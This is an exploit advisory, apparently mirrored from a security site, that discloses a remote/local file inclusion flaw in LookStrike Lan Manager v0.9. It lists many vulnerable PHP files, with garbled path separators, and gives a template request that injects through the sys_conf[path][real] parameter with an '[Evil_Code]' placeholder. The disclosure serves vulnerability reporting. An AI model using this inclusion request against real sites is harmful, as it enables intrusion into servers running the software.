--==+================================================================================+==--
--==+ LookStrike Lan Manager v0.9 RemoteLocal File Inclusion +==--
--==+================================================================================+==--
Author: MhZ91
Title: LookStrike Lan Manager v0.9 RemoteLocal File Inclusion
Download: http://sourceforge.net/project/showfiles.php?group_id=152660
Bug: RemoteLocal File Inclusion
Info: LookStrike is a tool written in PHP that manages Lan Party to gain a lot of time about the management of your Lan. You can also gather statistics of your players. LookStrike generate graphics and matches for tournaments automatically.
Visit: http://www.inj3ct-it.org
[*]----------------------------------------------------------
LookStrike Lan Manager v0.9 present a remotelocal file inclusion vulnerability in this file..
modulesclassTable.php
modulesclassdbdb_admins.php
modulesclassdbdb_alert.php
modulesclassdbdb_double.php
modulesclassdbdb_games.php
modulesclassdbdb_matches.php
modulesclassdbdb_match_teams.php
modulesclassdbdb_news.php
modulesclassdbdb_platform.php
modulesclassdbdb_players.php
modulesclassdbdb_server_group.php
modulesclassdbdb_server_ip.php
modulesclassdbdb_teams.php
modulesclassdbdb_team_players.php
modulesclassdbdb_tournaments.php
modulesclassdbdb_tournament_teams.php
modulesclassdbdb_trees.php
modulesclass ournamentMatch.php
modulesclass ournamentMatchTeam.php
modulesclass ournamentRule.php
modulesclass ournamentRuleBuilder.php
modulesclass ournamentRulePool.php
modulesclass ournamentRuleSingle.php
modulesclass ournamentRuleTree.php
modulesclass ournamentTournament.php
modulesclass ournamentTournamentTeam.php
modulesclass ournamentTree.php
modulesclass ournamentTreeSingle.php
all are exploitable by the variable "sys_conf[path][real]" for example
http://www.example.com/modules/class/Table.php?sys_conf[path][real]=[Evil_Code]
[*]----------------------------------------------------------
# sebug.net
京公网安备 11010502034610号
暂无评论